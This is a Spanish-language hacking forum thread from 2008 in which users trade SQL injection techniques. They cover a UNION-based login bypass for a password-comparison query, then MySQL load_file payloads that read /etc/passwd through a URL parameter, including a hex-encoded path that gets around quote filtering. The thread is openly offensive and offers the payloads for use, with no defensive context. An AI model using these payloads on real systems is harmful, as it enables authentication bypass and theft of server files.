SQL injection...

Iniciado por APOKLIPTICO, 1 Octubre 2008, 18:41 PM

0 Miembros y 1 Visitante están viendo este tema.

APOKLIPTICO

Hola gente, tengo una duda, que puedo explotar en la siguiente query:

Código (sql) [Seleccionar]
SELECT clave FROM users WHERE us='{X}'

Puedo inyectar en {X}, pero no acepta comandos concatenados (poner ";" y poner despues otro comando).

A alguien se le ocurre algo???
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.

s E t H


APOKLIPTICO

Pero no me va a devolver la tabla usando UNION, xq lo q hace es buscar el password en la tabla, lo almacena en una variable y despues lo compara con el q le pones como "password"...
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.

sirdarckcat

usuario: ' union select 'lalala
password: lalala

APOKLIPTICO

Claro! como no lo habia pensado...
Graciass!!
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.

Eazy

Para no crear un nuevo tema, alguien sabe como usar la funcion Load_file en una inyeccion mysql?
[/url]

Azielito

#6
es con union select creo recordar

union select

Código (sql) [Seleccionar]
union select 1,load_file(archivo),2,3...


foro.elhacker.net/bugs_y_exploits/dataextract_databaseuserversion_by_ozx-t229414.0.html

pepeluxx

http://www.site.com/?id=-1 union select 1,load_file('/etc/passwd'),3,...

o si filtra las comillas, en HEX:

http://www.site.com/?id=-1 union select 1,load_file(0x2f6574632f706173737764),3,...

Eazy

[/url]